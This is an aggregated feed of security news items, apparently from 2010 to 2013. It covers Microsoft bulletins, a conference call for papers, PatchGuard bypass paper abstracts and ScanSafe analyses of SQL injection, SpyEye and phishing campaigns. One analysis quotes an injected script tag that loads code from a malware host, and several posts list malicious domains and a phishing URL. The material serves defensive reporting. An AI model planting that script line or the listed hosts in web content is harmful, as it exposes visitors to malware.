http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Microsoft stopped offering browser-choice screen to European Windows consumers, in violation of 2009 agreement with antitrust regulators. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> [ACM CCS'11] Reminder: Deadline Approaching (May 6, 2011)

http://www.infosecnews.org/isn.rss InfoSec News: [ACM CCS'11] Reminder: Deadline Approaching (May 6, 2011): Forwarded from: ACM CCS 2011 <acmccs2011 (at) gmail.com> Apologies for multiple copies of this announcement. The annual ACM Computer and Communications Security Conference is a leading international forum for information security researchers, practitioners, developers, and users to explore cutting-edge ideas and results, and to exchange techniques, tools, and experiences. The conference seeks submissions from academia, government, and industry presenting novel research on all practical and theoretical aspects of computer and communications security. Papers should have relevance to the construction, evaluation, application, or operation of secure systems. Theoretical papers must make a convincing argument for the practical significance of the results. All topic areas related to computer and communications security are of interest and in scope. Accepted papers will be published by ACM Press in the conference proceedings. Outstanding papers will be invited for possible publication in a special issue of the ACM Transactions on Information and System Security. Paper Submission Process Submissions must be made by the deadline of May 6, 2011, through the website: http://www.easychair.org/conferences/?conf=ccs2011 The review process will be carried out in two phases and authors will have an opportunity to comment on the first-phase reviews. Authors will be notified of the first-phase reviews on Monday, June 20, 2011 and can send back their comments by Thursday, June 23, 2011. Submitted papers must not substantially overlap papers that have been published or that are simultaneously submitted to a journal, conference or workshop. Simultaneous submission of the same work is not allowed. Authors of accepted papers must guarantee that their papers will be presented at the conference. Paper Format Submissions must be at most 10 pages in double-column ACM format (note: pages must be numbered) excluding the bibliography and well-marked appendices, and at most 12 pages overall. Submissions must NOT be anonymized. Only PDF or Postscript files will be accepted. Submissions not meeting these guidelines risk rejection without consideration of their merits. Tutorial Submissions Proposals for long (3-hour) and short (1.5-hour) tutorials on research topics of current and emerging interest should be submitted electronically to the tutorials chair by May 24, 2011. The guidelines for tutorial proposals can be found on the website. Important Dates - Paper submission due: Friday, May 6, 2011 (23:59 UTC - 11) - First round reviews communicated to authors: Monday, June 20, 2011 - Author comments due on: Thursday, June 23, 2011 (23:59 UTC - 11) - Acceptance notification: Friday, July 15, 2011 - Final papers due: Thursday, August 11, 2011 GENERAL CHAIR: Yan Chen (Northwestern University, USA) PROGRAM CHAIRS: George Danezis (Microsoft Research, UK) Vitaly Shmatikov (University of Texas at Austin, USA) PROGRAM COMMITTEE: Michael Backes (Saarland University and MPI-SWS, Germany) Bruno Blanchet (INRIA, Ecole Normale Superieure, and CNRS, France) Dan Boneh (Stanford University, USA) Nikita Borisov (University of Illinois at Urbana-Champaign, USA) Herbert Bos (VU, Netherlands) Srdjan Capkun (ETHZ, Switzerland) Avik Chaudhuri (Adobe Advanced Technology Labs, USA) Shuo Chen (Microsoft Research, USA) Manuel Costa (Microsoft Research, UK) Anupam Datta (CMU, USA) Stephanie Delaune (CNRS and ENS-Cachan, France) Roger Dingledine (The Tor Project, USA) Orr Dunkelman (University of Haifa and Weizmann Institute, Israel) Ulfar Erlingsson (Google, USA) Nick Feamster (Georgia Tech, USA) Bryan Ford (Yale University, USA) Cedric Fournet (Microsoft Research, UK) Paul Francis (MPI-SWS, Germany) Michael Freedman (Princeton University, USA) Guofei Gu (Texas A&M University, USA) Nicholas Hopper (University of Minnesota, USA) Collin Jackson (CMU Silicon Valley, USA) Markus Jakobsson (Paypal, USA) Jaeyeon Jung (Intel Labs Seattle, USA) Apu Kapadia (Indiana University Bloomington, USA) Jonathan Katz (University of Maryland, USA) Stefan Katzenbeisser (TU Darmstadt, Germany) Arvind Krishnamurthy (University of Washington, USA) Christopher Kruegel (University of California, Santa Barbara, USA) Ralf Kuesters (University of Trier, Germany) Ninghui Li (Purdue University, USA) Benjamin Livshits (Microsoft Research, USA) Heiko Mantel (TU Darmstadt, Germany) John Mitchell (Stanford University, USA) Fabian Monrose (University of North Carolina at Chapel Hill, USA) Steven Murdoch (University of Cambridge, UK) David Naccache (Ecole Normale Superieure, France) Arvind Narayanan (Stanford University, USA) Kenny Paterson (Royal Holloway, University of London, UK) Niels Provos (Google, USA) Mike Reiter (University of North Carolina at Chapel Hill, USA) Thomas Ristenpart (University of Wisconsin, USA) Hovav Shacham (University of California, San Diego, USA) Adam Smith (Pennsylvania State University, USA) Anil Somayaji (Carleton University, Canada) Francois-Xavier Standaert (UCL, Belgium) Eran Tromer (Tel Aviv University, Israel) Leendert Van Doorn (AMD, USA) Paul Van Oorschot (Carleton University, Canada) Bogdan Warinschi (University of Bristol, UK) Brent Waters (University of Texas at Austin, USA) Robert Watson (University of Cambridge, United Kingdom) Xiaowei Yang (Duke University, USA) Haifeng Yu (National University of Singapore, Singapore)

==> RSA 2013: Microsoft VP predicts a sunny outlook for information security

http://www.infosecurity-magazine.com/rss/news/ Despite years of bad press for organizations across all sectors, Scott Charney says the information security industry continues to meet the challenges it faces as they develop.

==> A hacker's dream: two-thirds of SharePoint users have no security policy

http://www.infosecurity-magazine.com/rss/news/ Even though Microsoft SharePoint is widely deployed throughout enterprises and SMBs as a collaboration platform, a shocking two-thirds of SharePoint-using companies in a recent survey have admitted to having no active security policy in place for the application.

==> IT Compliance Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This Solution Accelerator can help you shift your governance, risk, and compliance (GRC) efforts from people to technology. Use its configuration guidance to help efficiently address your organization's GRC objectives. See the online job aids for compliance.

==> Microsoft Operations Framework (MOF) 4.0

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml MOF 4.0 delivers practical guidance for everyday IT practices and activities, helping users establish and implement reliable, cost-effective IT services for governance, risk, and compliance (GRC) activities.

==> Security Compliance Management Toolkit

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This toolkit provides proven methods that your organization can use to effectively monitor the compliance state of recommended security baselines for Windows Vista, Windows XP Service Pack 2 (SP2), and Windows Server 2003 SP2.

==> Security Risk Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Security Risk Management Guide helps customers plan, build, and maintain a successful security risk management program.

==> SQL Server 2008 Compliance Guidance

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The SQL Server 2008 Compliance Guidance white paper is a complement to the SQL Server 2008 compliance software development kit (SDK).

==> Microsoft Security Assessment Tool

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Microsoft Security Assessment Tool (MSAT) consists of more than 200 questions designed to help identify and address security risks in IT environments. It includes best practices, standards such as ISO 17799, 27001 and NIST-800.x, as well as recommendations from the Microsoft Trustworthy Computing Group.

==> Microsoft Security Advisory (2755801): Update for Vulnerabilities in Adobe Flash Player in Internet Explorer 10 - Version: 9.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-020 - Critical : Vulnerability in OLE Automation Could Allow Remote Code Execution (2802968) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-012 - Critical : Vulnerabilities in Microsoft Exchange Server Could Allow Remote Code Execution (2809279) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for February 2013 - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-019 - Important : Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of Privilege (2790113) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-018 - Important : Vulnerability in TCP/IP Could Allow Denial of Service (2790655) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-017 - Important : Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2799494) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-016 - Important : Vulnerabilities in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778344) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-015 - Important : Vulnerability in .NET Framework Could Allow Elevation of Privilege (2800277) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-014 - Important : Vulnerability in NFS Server Could Allow Denial of Service (2790978) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-013 - Important : Vulnerabilities in FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution (2784242) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-011 - Critical : Vulnerability in Media Decompression Could Allow Remote Code Execution (2780091) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-010 - Critical : Vulnerability in Vector Markup Language Could Allow Remote Code Execution (2797052) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-009 - Critical : Cumulative Security Update for Internet Explorer (2792100) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-006 - Important : Vulnerability in Microsoft Windows Could Allow Security Feature Bypass (2785220) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-005 - Important : Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-004 - Important : Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2769324) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-060 - Critical : Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2720573) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-057 - Important : Vulnerability in Microsoft Office Could Allow Remote Code Execution (2731879) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-043 - Critical : Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (2722479) - Version: 4.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for January 2013 - Version: 3.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-008 - Critical : Security Update for Internet Explorer (2799329) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2798897): Fraudulent Digital Certificates Could Allow Spoofing - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2794220): Vulnerability in Internet Explorer Could Allow Remote Code Execution - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-007 - Important : Vulnerability in Open Data Protocol Could Allow Denial of Service (2769327) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-003 - Important : Vulnerabilities in System Center Operations Manager Could Allow Elevation of Privilege (2748552) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-002 - Critical : Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (2756145) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-001 - Critical : Vulnerability in Windows Print Spooler Components Could Allow Remote Code Execution (2769369) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (973811): Extended Protection for Authentication - Version: 1.14

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-078 - Critical : Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2783534) - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for December 2012 - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-082 - Important : Vulnerability in DirectPlay Could Allow Remote Code Execution (2770660) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-050 - Important : Vulnerabilities in SharePoint Could Allow Elevation of Privilege (2695502) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for July 2012 - Version: 5.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-083 - Important : Vulnerability in IP-HTTPS Component Could Allow Security Feature Bypass (2765809) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-081 - Critical : Vulnerability in Windows File Handling Component Could Allow Remote Code Execution (2758857) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-080 - Critical : Vulnerabilities in Microsoft Exchange Server Could Allow Remote Code Execution (2784126) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-079 - Critical : Vulnerability in Microsoft Word Could Allow Remote Code Execution (2780642) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-077 - Critical : Cumulative Security Update for Internet Explorer (2761465) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2749655): Compatibility Issues Affecting Signed Microsoft Binaries - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-059 - Important : Vulnerability in Microsoft Visio Could Allow Remote Code Execution (2733918) - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for August 2012 - Version: 3.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-073 - Moderate : Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information Disclosure (2733829) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-058 - Critical : Vulnerabilities in Microsoft Exchange Server WebReady Document Viewing Could Allow Remote Code Execution (2740358) - Version: 2.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-074 - Critical : Vulnerabilities in .NET Framework Could Allow Remote Code Execution (2745030) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-072 - Critical : Vulnerabilities in Windows Shell Could Allow Remote Code Execution (2727528) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for November 2012 - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-076 - Important : Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2720184) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-075 - Critical : Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2761226) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-071 - Critical : Cumulative Security Update for Internet Explorer (2761451) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> The WOW-Effect: Imho something the IT-Security community should be aware of ...

http://www.offensivecomputing.net/?q=node/feed Dear like-mindeds, we (CERT.at, the Austrian National Computer Emergency Response Team) just released our latest paper which addresses an issue with Microsoft Windows 64-bit that has high potential to affect the IT-Security community. Especially those dealing with malware analysis and accordingly investigations. It's even possible that some of us already are or were affected but just didn't notice. The goal of my paper is to raise the IT-Security community's awareness regarding this issue. In short: this issue - I call it the "WOW-Effect" - is a so to say unintentionally implication of Microsoft's WOW64 technology and the according redirection functionality. You can find the paper on our website. If you have any questions regarding the "WOW-Effect" or would like to give me some feedback feel free to contact me via wojner_at_cert.at. Here's the link to the paper: http://cert.at/downloads/papers/wow_effect_en.html Enjoy reading! Cheers, Christian Wojner CERT.at

==> New Orkut – Upload Images/Songs/Videos in Profile

http://www.thehackerslibrary.com/?feed=rss New Orkut! The latest Buzz in the E-World. But now almost all have it. And its still fresh. Owing to the fact that its like Windows Vista compared to XP. [A huge copy of something else, but who cares as long as it looks good on your screen]. Well I am not here to write [...]

==> Get rid of Windows Vista Administrative Password

http://www.thehackerslibrary.com/?feed=rss Method 1: System Restore This only works in cases where you changed your password to something new and then forgot it or deleted a user account by accident. In order for this to work, there must be a System Restore point at which a logon was successful for the problem account. Also, this is not [...]

==> Static DLL Injection

http://www.thehackerslibrary.com/?feed=rss INTRODUCTION DEFINING DLL According to microsoft “A DLL is a library that contains code and data that can be used by more than one program at the same time. For example, in Windows operating systems, the Comdlg32 DLL performs common dialog box related functions. Therefore, each program can use the functionality that is contained in [...]

==> Microsoft’s WorldWide Telescope: Virtual telescope opens night sky

http://www.thehackerslibrary.com/?feed=rss Where science meets imagination ! Microsofts WorldWide Telescope Released. May 12th, 2008 Any Star Wars , Star Trek fan (like me) knows that space travel is not always easy, but Microsoft wants to make traveling the final frontier as simple as turning on your computer. Joining Google Sky and Stellarium is Microsofts entrant to the [...]

==> PatchGuard Reloaded: A Brief Analysis of PatchGuard Version 3

http://www.uninformed.org/uninformed.rss Since the publication of previous bypass or circumvention techniques for Kernel Patch Protection (otherwise known as ``PatchGuard''), Microsoft has continued to refine their patch protection system in an attempt to foil known bypass mechanisms. With the release of Windows Server 2008 Beta 3, and later a full-blown distribution of PatchGuard to Windows Vista / Windows Server 2003 via Windows Update, Microsoft has introduced the next generation of PatchGuard to the general public (``PatchGuard 3''). As with previous updates to PatchGuard, version three represents a set of incremental changes that are designed to address perceived weaknesses and known bypass vectors in earlier versions. Additionally, PatchGuard 3 expands the set of kernel variables that are protected from unauthorized modification, eliminating several mechanisms that might be used to circumvent PatchGuard while co-existing (as opposed to disabling) it. This article describes some of the changes that have been made in PatchGuard 3. This article also proposes several new techniques that can be used to circumvent PatchGuard's defenses. Countermeasures for these techniques are also discussed.

==> Getting out of Jail: Escaping Internet Explorer Protected Mode

http://www.uninformed.org/uninformed.rss With the introduction of Windows Vista, Microsoft has added a new form of mandatory access control to the core operating system. Internally known as "integrity levels", this new addition to the security manager allows security controls to be placed on a per-process basis. This is different from the traditional model of per-user security controls used in all prior versions of Windows NT. In this manner, integrity levels are essentially a bolt-on to the existing Windows NT security architecture. While the idea is theoretically sound, there does exist a great possibility for implementation errors with respect to how integrity levels work in practice. Integrity levels are the core of Internet Explorer Protected Mode, a new "low-rights" mode where Internet Explorer runs without permission to modify most files or registry keys. This places both Internet Explorer and integrity levels as a whole at the forefront of the computer security battle with respect to Windows Vista.

==> Subverting PatchGuard Version 2

http://www.uninformed.org/uninformed.rss Windows Vista x64 and recently hotfixed versions of the Windows Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode patch prevention technology known as PatchGuard. This new version of PatchGuard improves on the previous version in several ways, primarily dealing with attempts to increase the difficulty of bypassing PatchGuard from the perspective of an independent software vendor (ISV) deploying a driver that patches the kernel. The feature-set of PatchGuard version 2 is otherwise quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and several kernel global function pointer variables (as well as kernel code) are guarded against unauthorized modification. This paper proposes several methods that can be used to bypass PatchGuard version 2 completely.

==> Spate of SpyEye Trojan Email

http://blog.scansafe.com/journal/rss.xml Beginning on May 5th, ScanSafe has observed numerous instances of a variant of the SpyEye family of trojans being delivered via email. The overwhelming majority of these are delivered via corp mail; very little have been observed via free webmail services. The rate of encounter suggests the mail may be getting through corp spam filtering at the affected locations. The body of the email contains a link that downloads a zip file containing the malware. The malware appears to be hosted on compromised websites in the following folder location: compromiseddomain\order\Order.zip The zip itself extracts into an executable. However, a double extension ruse combined with multiple spaces makes it appear as if the file is actually a .doc file. (The spaces push the .exe extension off the screen). Obviously this could trick many users into attempting to open the “doc” in which case they will actually infect their PC with the SpyEye trojan. ScanSafe detects and blocks this malware as: Mal/BredoZp-B Mal/EncPk-YJ Trojan.Win32.Menti.gjgn Trojan-Spy.Win32.SpyEyes.hdy First observed encounter was 05-may-11 at 11:38:05GMT.

==> Lizamoon SQL Injection: 7 Months Old and Counting

http://blog.scansafe.com/journal/rss.xml The Lizamoon SQL injection attack is not new; its actually part of a continuous SQLi attack that spans the past seven months. Lizamoon.com is just one of the more recent of the 40+ malware domains that have been used in the ongoing injection attacks. Here are some quick facts regarding the SQLi / Lizamoon compromises: * A total of 42 malware domains have been observed during the 7 months this attack has been ongoing; * The first encounter Cisco ScanSafe recorded was 20-sep-10 21:58:08 GMT; * Only 0.15% (zero point one five percent) have involved encounters with functional / active malware domains; * 99.85% of encounters have involved malware domains that were non-resolvable (shutdown / offline) at the time of encounter; * 55% of the encounters occurred on March 25th when the Lizamoon domain was added; * The high rate of encounters on the 25th was solely due to a single high profile website that was compromised; * Of the Lizamoon encounters on March 25th, only 0.13% were encounters with the live domain. 99.87% were non-resolvable (i.e. the domain was offline / not delivering content). Here's the current list of domains we've observed in these attacks, from September 2010 through March 31, 2011: agasi-story.info alexblane.com alisa-carter.com ave-stats.info books-loader.info eva-marine.info extra-911.info extra-service.info general-st.info google-stat50.info google-stats44.info google-stats45.info google-stats47.info google-stats48.info google-stats49.info google-stats50.info google-stats54.info google-stats55.info google-stats73.info lizamoon.com milapop.com mol-stats.info multi-stats.info online-guest.info online-stats201.info people-on.info pop-stats.info security-stats.info social-stats.info sol-stats.info star-stats.info stats-master11.info stats-master111.info stats-master88.info stats-master99.info system-stats.info t6ryt56.info tadygus.com tzv-stats.info urllizamoon--com.rtrk.co.uk world-stats598.info

==> Royal Engagement May Lead to Royal Malware Pains

http://blog.scansafe.com/journal/rss.xml The Telegraph reports "Royal memorabilia industry prepares to cash in" - The battle to cash in on Prince William’s impending marriage to Kate Middleton has already begun, with an array of royal memorabilia set to flood the market. My first thought on reading this was that malware and scammers will be even quicker to cash in. Indeed, many are proclaiming that Prince William's and Kate Middleton's wedding (set for sometime next spring) will be the biggest marital event since Princess Di and Prince Charles. With that in mind, it's important to remember three important thingst: 1. Major breaking news events are favorite themes for malware purveyors and scammers; 2. Clicking unsolicited links in email and IM are a frequent path of infection; 3. Criminals work fast - expect your favorite search engine to already be sprinkled liberally with malicious results regarding the engagement and upcoming nuptials. Cisco ScanSafe research indicates that 3 out of every 100 malware encounters results from people clicking unsolicited malicious links in email, IM and social messaging, and 10 out of evey 100 encounters occur via search engine results. Bottom line - think before you click, consider the source, and pay attention to the destination URL. By following this advice, hopefully you can toast to the happy couple without toasting your computer.

==> Phish with a Side of Barbecue

http://blog.scansafe.com/journal/rss.xml Looks like the latest Bank of America phishing scam is springboarding off a couple of compromised websites. First, here's a look at the predictably worded phishing email: Dear Bank of America Customer, We recently have determined that different computers have logged in your Bank of America Online Banking account, and multiple password failures were present before the logons. We now need you to re-confirm your account information to us. If this is not completed by July 31st, 2010, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner. In order to confirm your Online Bank records, we may require some specific information from you. To restore your account, please Sign in to Online Banking. Here's where victims get sauced. The link behind "Sign in to Online Banking" actually points to gramsbbq.org/bain. Now grambbq.org is the legitimate website for Gram's Mission Barbecue Palace in Riverside, CA. The gramsbbq.org/bain page is a 302 redirect that leads to a phishing page hosted on a second compromised site: chasingarcadia.com (the website for Canadian band Chasing Arcadia). The actual phishing page is at: http://www.chasingarcadia.com/channel/safe.sslbankofamerica.com/index.htm This use of compromised sites as redirectors and phishing host enables the attackers to bypass reputation filters and/or community-based trust reporting. And it increases the collateral damage, because if/when the compromised sites are blacklisted, those businesses could suffer as a result.

==> WSJ a Victim, Not the Source, of SQL Injection

http://blog.scansafe.com/journal/rss.xml As mentioned earlier this week, about 7k pages (not sites) have been struck by SQL injected iframes pointing to malware on robint.us. (That number has been over-inflated by over 100k or even a million due to poorly constructed search queries, which was the subject of the previous post on the topic). Anyway, in some of the reports, one of the sites claimed to be compromised was that of the Wall Street Journal (WSJ.com). However, ScanSafe investigation reveals the SQL injection attack that appeared on certain pages of the WSJ site weren't the result of compromise on WSJ directly, but rather the result of compromise of a third-party partner. That partner, adicio.com, provides real estate listings that are in turn displayed on certain pages of the WSJ.com website. Of course, from a site visitor's perspective, this might seem a bit semantic. But still, it is worth pointing out that it wasn't really wsj.com that was compromised.

==> Robint.us a Poster bleep for Repeat Injections

http://blog.scansafe.com/journal/rss.xml One of many SQL injection attacks is getting some blogger attention, largely due to generic searches on the malware domain name. The malicious iframe on the compromised site is: script src=http://ww.robint.us/u.js Search on the full iframe with quotes and you get about 7k hits in Google. But search on just the domain name or omit the quotes and you get over a million hits. That's because the more generic search picks up any page that mentions the domain or includes any mix of those keywords. This loosely constructed search mistake causes some to believe the attack is much larger than it really is. Certainly 7k Web pages compromised is nothing to sneeze at but it's certainly not a million pages and certainly nothing new - many of these same compromised pages have been repeatedly compromised in one SQL injection attack after another since 2007. On a more positive note, when SQL injection attacks first went mainstream a few years back, it wasn't uncommon to see a million+ pages compromised in a single attack. From that perspective, 7k is a vast improvement and shows that at least many sites are paying attention and taking the appropriate security measures. On the downside, attacks like robint.us are just one of over a thousand unique attacks carried out via the Web each month.

==> GoDaddy Attacks Top Web Malware in May

http://blog.scansafe.com/journal/rss.xml Some interesting stats from May. * 16196 unique malicious domains. * The top ten malicious domains comprised 23% of all Web malware attacks in May 2010. * Five of the top ten were related to attacks against GoDaddy-hosted websites, for a total of 14% of all Web malware in May 2010. * Top Web malware was Trojan.JS.Redirector.cq, the majority of which resulted from attacks against GoDaddy-hosted websites. * Gumblar was the second most prevalent Web malware encountered, at 7%. * Third most prevalent Web-distributed malware encountered was Backdoor.Win32.Alureon, at 6%. Top Ten Malicious Domains, May 2010 holasionweb.com* - 7% www.sitepalace.com - 3% losotrana.com* - 2% indesignstudioinfo.com* - 2% kdjkfjskdfjlskdjf.com* - 2% easfindnex.org - 2% findermar.org - 2% 76.73.33.109 - 2% findrasup.org - 1% zettapetta.com* - 1% *Related to attacks against GoDaddy-hosted websites Top Ten Web Malware, May 2010 Trojan.JS.Redirector.cq - 14% Exploit.JS.Gumblar - 7% Backdoor.Win32.Alureon - 6% Exploit.Java.CVE-2009-3867.d - 3% Trojan.JS.Redirector.at - 3% Downloader.JS.Agent.fhx - 2% OI.Backdoor.Win32.Autorun.cx - 2% OI.Win32.Susp.ms - 2% Trojan.Iframe.f - 2% Trojan.GIFIframe.a - 2%

==> WordPress Hacks: Not Just NetSol and GoDaddy

http://blog.scansafe.com/journal/rss.xml Over the past month or so, there have been a series of ongoing compromises which have been interchangeably blamed on WordPress, Network Solutions, or GoDaddy. However, the attacks are occurring on many other hosts as well, including: 1 & 1 DreamHost In2Net Hostway Media Temple ServerBeach and several others. While many of the compromised sites are using WordPress, some are not. The two main attacks are: (1) the Google / WordPress pharma attacks and (2) the Grepad.com family of attacks that netted Network Solutions hosted sites, some U.S. Treasury sites, and many, many popular niche 'mom and pop' style sites. Google / WordPress Pharma Hacks In the Google / WordPress pharma attack, the attackers are targeting popular Web pages and modifying the title tag of those pages to include a pharmaceutical sales pitch. Searches that would normally cause the legitimate site to appear in search engine results pages (SERPs) will also include the manipulated title tag. The link itself still points to the legitimate site, but modifications on the compromised site will cause an automatic redirect to the pharmaceutical site. Note that many of the sites that appear in Google SERPs for these title tags are not necessarily compromised. Quite often, blog and forum comments will adopt the title tag of the post and spammers are using these same tags. For those that are compromised, currently the redirect points to "thepharmacydiscount.com/group/bestsellers.html?said=compromised.com" where compromised.com equals the name of the legitimate (but compromised site) that is delivering the redirect. The point behind the Google / WordPress pharma attacks is to leverage the popularity ranking of the compromised sites, which boosts the SERPs ranking for the pharma keywords used. Grepad.com Attacks The intent of the Grepad.com family of attacks is not to gain favorable placement in SERPs to peddle counterfeit bleep, but rather to download malware to the site visitors' PCs. Pages on the compromised websites are embedded with hidden iframes that load content from the malware domain. Multiple malware domains have been used in these attacks, including grepad.com, ginopost.com, bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net. Exploits of multiple vulnerabilities are attemped in order to download this malware. A list of observed exploits can be found in this blog post. Commonalities Between Attacks In both sets of attacks, the attackers are filtering based on whether the clickthrough to the site is human or a search spider. In the pharma attacks, the malformed title is only presented to search spiders and the redirect only occurs if you click the link from SERPs. If you visit the site directly, by typing in the URL or from a non-SERPs link on another site, the legitimate page will load normally. The exact opposite is true with the Grepad.com family of attacks. In these cases, the filters suppress the compromise so that search spiders don't see the embedded iframe. If the link is accessed directly (or via a link from a non-search engine), then the iframe will be rendered. However, the attackers also drop a cookie when visitors hit a compromised page and suppress the iframe on subsequent visits. Filtering is also being done by IP address ranges, operating system, and user_agent to determine when the embedded iframe (or pharma redirect) will occur. The Million Dollar Question: How? The why is easy to answer: attackers want to make money. The how is a bit more cloudy. It appears the attacker is able to read wp-config.php which by necessity contains plaintext credentials for the WordPress database. Normally, wp-config.php should not be externally readable, unless the user has not properly configured file permissions. In any event, once initial access was gained, the attackers inserted or modified entries in the wp-option table for the active WordPress database. In subsequent phases (in the case of the Grepad family), the attackers modified php.ini / .htaccess, uploading malicious scripts which then embed the iframe. At this point, the attackers have the ability to plant PHP backdoors on the compromised sites, a precedent first set by Gumblar. The presence of the backdoor would allow continued access to the compromised sites, even after file permissions were properly configured or FTP credentials had been changed. And if proper segregation is not done, bleed over to other sites on the same hosted share can still occur. It's worth noting that the U.S. Bureau of Engraving and Printing (bep.gov and moneyfactory.gov) were compromised in the most recent wave of the 